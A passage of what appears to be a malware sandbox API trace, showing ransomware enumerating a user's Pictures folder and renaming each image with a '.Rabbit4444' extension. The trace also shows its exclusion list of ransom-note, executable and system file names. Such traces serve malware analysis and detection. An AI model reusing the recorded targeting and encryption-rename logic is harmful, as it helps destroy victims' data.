dwFlags=0x1) returned 1 [0048.828] InterlockedExchangeAdd (in: Addend=0xff618, Value=75536 | out: Addend=0xff618) returned 18420832 [0048.828] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3432 [0048.828] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x135b5640, ftCreationTime.dwHighDateTime=0x1d4cc2b, ftLastAccessTime.dwLowDateTime=0x373a11e0, ftLastAccessTime.dwHighDateTime=0x1d4c7a9, ftLastWriteTime.dwLowDateTime=0x373a11e0, ftLastWriteTime.dwHighDateTime=0x1d4c7a9, nFileSizeHigh=0x0, nFileSizeLow=0x10da5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v9mOV_kgH.gif", cAlternateFileName="V9MOV_~1.GIF")) returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="Rabbit4444.exe") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2=".") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="..") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="windows") returned -1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="bootmgr") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="pagefile.sys") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="boot") returned 1 [0048.828] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="ids.txt") returned 1 [0048.829] lstrcmpiW (lpString1="v9mOV_kgH.gif", lpString2="NTUSER.DAT") returned 1 [0048.829] lstrcpyW (in: lpString1=0x130eb6a, lpString2="v9mOV_kgH.gif" | out: lpString1="v9mOV_kgH.gif") returned="v9mOV_kgH.gif" [0048.829] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\v9mOV_kgH.gif", dwFileAttributes=0x0) returned 1 [0048.829] lstrlenW (lpString="v9mOV_kgH.gif") returned 13 [0048.829] lstrlenW (lpString="Rabbit4444") returned 10 [0048.829] lstrcmpiW (lpString1="OV_kgH.gif", lpString2="Rabbit4444") returned -1 [0048.829] lstrlenW (lpString=".dll") returned 4 [0048.829] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.829] lstrlenW (lpString=".lnk") returned 4 [0048.829] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.829] lstrlenW (lpString=".ini") returned 4 [0048.829] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.829] lstrlenW (lpString=".sys") returned 4 [0048.829] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.829] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\v9mOV_kgH.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\v9mov_kgh.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.829] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.829] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14013997964) returned 1 [0048.829] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69029) returned 1 [0048.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0048.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0048.829] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x110b0, lpName=0x0) returned 0x298 [0048.830] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x110b0) returned 0x70000 [0048.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.832] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14014278495) returned 1 [0048.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0048.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0048.832] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.833] CloseHandle (hObject=0x298) returned 1 [0048.833] CloseHandle (hObject=0x278) returned 1 [0048.835] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\v9mOV_kgH.gif.Rabbit4444") returned 49 [0048.835] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\v9mOV_kgH.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\v9mov_kgh.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\v9mOV_kgH.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\v9mov_kgh.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.836] InterlockedExchangeAdd (in: Addend=0xff618, Value=69040 | out: Addend=0xff618) returned 18496368 [0048.836] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3434 [0048.836] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafbc7f0, ftCreationTime.dwHighDateTime=0x1d4c59e, ftLastAccessTime.dwLowDateTime=0x727d83c0, ftLastAccessTime.dwHighDateTime=0x1d4c80f, ftLastWriteTime.dwLowDateTime=0x727d83c0, ftLastWriteTime.dwHighDateTime=0x1d4c80f, nFileSizeHigh=0x0, nFileSizeLow=0x7f5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vGoIqs1-6HE.jpg", cAlternateFileName="VGOIQS~1.JPG")) returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="Rabbit4444.exe") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2=".") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="..") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="windows") returned -1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="bootmgr") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="pagefile.sys") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="boot") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="ids.txt") returned 1 [0048.836] lstrcmpiW (lpString1="vGoIqs1-6HE.jpg", lpString2="NTUSER.DAT") returned 1 [0048.836] lstrcpyW (in: lpString1=0x130eb6a, lpString2="vGoIqs1-6HE.jpg" | out: lpString1="vGoIqs1-6HE.jpg") returned="vGoIqs1-6HE.jpg" [0048.836] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\vGoIqs1-6HE.jpg", dwFileAttributes=0x0) returned 1 [0048.836] lstrlenW (lpString="vGoIqs1-6HE.jpg") returned 15 [0048.836] lstrlenW (lpString="Rabbit4444") returned 10 [0048.836] lstrcmpiW (lpString1="s1-6HE.jpg", lpString2="Rabbit4444") returned 1 [0048.836] lstrlenW (lpString=".dll") returned 4 [0048.836] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.836] lstrlenW (lpString=".lnk") returned 4 [0048.836] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.836] lstrlenW (lpString=".ini") returned 4 [0048.836] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.836] lstrlenW (lpString=".sys") returned 4 [0048.837] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.837] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\vGoIqs1-6HE.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\vgoiqs1-6he.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.837] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.837] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14014743737) returned 1 [0048.837] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=32602) returned 1 [0048.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0048.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0048.837] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8260, lpName=0x0) returned 0x298 [0048.837] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8260) returned 0x70000 [0048.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.839] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14014974056) returned 1 [0048.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0048.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0048.839] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.839] CloseHandle (hObject=0x298) returned 1 [0048.840] CloseHandle (hObject=0x278) returned 1 [0048.841] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\vGoIqs1-6HE.jpg.Rabbit4444") returned 51 [0048.841] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\vGoIqs1-6HE.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\vgoiqs1-6he.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\vGoIqs1-6HE.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\vgoiqs1-6he.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.842] InterlockedExchangeAdd (in: Addend=0xff618, Value=32608 | out: Addend=0xff618) returned 18565408 [0048.842] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3436 [0048.842] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71a7df20, ftCreationTime.dwHighDateTime=0x1d4d392, ftLastAccessTime.dwLowDateTime=0xd2bbea90, ftLastAccessTime.dwHighDateTime=0x1d4d4a5, ftLastWriteTime.dwLowDateTime=0xd2bbea90, ftLastWriteTime.dwHighDateTime=0x1d4d4a5, nFileSizeHigh=0x0, nFileSizeLow=0xc53e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VkOhDAWokkfYOk9.gif", cAlternateFileName="VKOHDA~1.GIF")) returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="Rabbit4444.exe") returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2=".") returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="..") returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="windows") returned -1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="bootmgr") returned 1 [0048.842] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="pagefile.sys") returned 1 [0048.843] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="boot") returned 1 [0048.843] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="ids.txt") returned 1 [0048.843] lstrcmpiW (lpString1="VkOhDAWokkfYOk9.gif", lpString2="NTUSER.DAT") returned 1 [0048.843] lstrcpyW (in: lpString1=0x130eb6a, lpString2="VkOhDAWokkfYOk9.gif" | out: lpString1="VkOhDAWokkfYOk9.gif") returned="VkOhDAWokkfYOk9.gif" [0048.843] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\VkOhDAWokkfYOk9.gif", dwFileAttributes=0x0) returned 1 [0048.843] lstrlenW (lpString="VkOhDAWokkfYOk9.gif") returned 19 [0048.843] lstrlenW (lpString="Rabbit4444") returned 10 [0048.843] lstrcmpiW (lpString1="kfYOk9.gif", lpString2="Rabbit4444") returned -1 [0048.843] lstrlenW (lpString=".dll") returned 4 [0048.843] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.843] lstrlenW (lpString=".lnk") returned 4 [0048.843] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.843] lstrlenW (lpString=".ini") returned 4 [0048.843] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.843] lstrlenW (lpString=".sys") returned 4 [0048.843] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.843] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\VkOhDAWokkfYOk9.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\vkohdawokkfyok9.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.843] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.843] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14015401576) returned 1 [0048.843] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=50494) returned 1 [0048.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0048.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.843] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc840, lpName=0x0) returned 0x298 [0048.844] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc840) returned 0x70000 [0048.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.845] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14015610665) returned 1 [0048.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0048.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.845] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.846] CloseHandle (hObject=0x298) returned 1 [0048.846] CloseHandle (hObject=0x278) returned 1 [0048.848] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\VkOhDAWokkfYOk9.gif.Rabbit4444") returned 55 [0048.848] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\VkOhDAWokkfYOk9.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\vkohdawokkfyok9.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\VkOhDAWokkfYOk9.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\vkohdawokkfyok9.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.849] InterlockedExchangeAdd (in: Addend=0xff618, Value=50496 | out: Addend=0xff618) returned 18598016 [0048.849] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3438 [0048.849] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a6c930, ftCreationTime.dwHighDateTime=0x1d4c6a9, ftLastAccessTime.dwLowDateTime=0x5d6b2270, ftLastAccessTime.dwHighDateTime=0x1d4c6cb, ftLastWriteTime.dwLowDateTime=0x5d6b2270, ftLastWriteTime.dwHighDateTime=0x1d4c6cb, nFileSizeHigh=0x0, nFileSizeLow=0x5189, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y0AydhkNNUR2.jpg", cAlternateFileName="Y0AYDH~1.JPG")) returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="Rabbit4444.exe") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2=".") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="..") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="windows") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="bootmgr") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="pagefile.sys") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="boot") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="ids.txt") returned 1 [0048.849] lstrcmpiW (lpString1="Y0AydhkNNUR2.jpg", lpString2="NTUSER.DAT") returned 1 [0048.849] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Y0AydhkNNUR2.jpg" | out: lpString1="Y0AydhkNNUR2.jpg") returned="Y0AydhkNNUR2.jpg" [0048.849] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Y0AydhkNNUR2.jpg", dwFileAttributes=0x0) returned 1 [0048.849] lstrlenW (lpString="Y0AydhkNNUR2.jpg") returned 16 [0048.849] lstrlenW (lpString="Rabbit4444") returned 10 [0048.849] lstrcmpiW (lpString1="kNNUR2.jpg", lpString2="Rabbit4444") returned -1 [0048.849] lstrlenW (lpString=".dll") returned 4 [0048.849] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.849] lstrlenW (lpString=".lnk") returned 4 [0048.849] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.849] lstrlenW (lpString=".ini") returned 4 [0048.849] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.849] lstrlenW (lpString=".sys") returned 4 [0048.849] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.849] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Y0AydhkNNUR2.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\y0aydhknnur2.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.850] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.850] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14016038936) returned 1 [0048.850] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=20873) returned 1 [0048.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0048.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0048.850] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5490, lpName=0x0) returned 0x298 [0048.850] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5490) returned 0x70000 [0048.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.851] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14016187965) returned 1 [0048.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0048.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0048.851] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.851] CloseHandle (hObject=0x298) returned 1 [0048.852] CloseHandle (hObject=0x278) returned 1 [0048.855] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Y0AydhkNNUR2.jpg.Rabbit4444") returned 52 [0048.855] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Y0AydhkNNUR2.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\y0aydhknnur2.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Y0AydhkNNUR2.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\y0aydhknnur2.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.855] InterlockedExchangeAdd (in: Addend=0xff618, Value=20880 | out: Addend=0xff618) returned 18648512 [0048.855] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3440 [0048.856] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed732e0, ftCreationTime.dwHighDateTime=0x1d4d36c, ftLastAccessTime.dwLowDateTime=0x358edaa0, ftLastAccessTime.dwHighDateTime=0x1d4ccd2, ftLastWriteTime.dwLowDateTime=0x358edaa0, ftLastWriteTime.dwHighDateTime=0x1d4ccd2, nFileSizeHigh=0x0, nFileSizeLow=0x1252e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YGhL_kMC_eqFIP.gif", cAlternateFileName="YGHL_K~1.GIF")) returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="Rabbit4444.exe") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2=".") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="..") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="windows") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="bootmgr") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="pagefile.sys") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="boot") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="ids.txt") returned 1 [0048.856] lstrcmpiW (lpString1="YGhL_kMC_eqFIP.gif", lpString2="NTUSER.DAT") returned 1 [0048.856] lstrcpyW (in: lpString1=0x130eb6a, lpString2="YGhL_kMC_eqFIP.gif" | out: lpString1="YGhL_kMC_eqFIP.gif") returned="YGhL_kMC_eqFIP.gif" [0048.856] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YGhL_kMC_eqFIP.gif", dwFileAttributes=0x0) returned 1 [0048.856] lstrlenW (lpString="YGhL_kMC_eqFIP.gif") returned 18 [0048.856] lstrlenW (lpString="Rabbit4444") returned 10 [0048.856] lstrcmpiW (lpString1="_eqFIP.gif", lpString2="Rabbit4444") returned -1 [0048.856] lstrlenW (lpString=".dll") returned 4 [0048.856] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.856] lstrlenW (lpString=".lnk") returned 4 [0048.856] lstrcmpiW (lpString1=".gif", 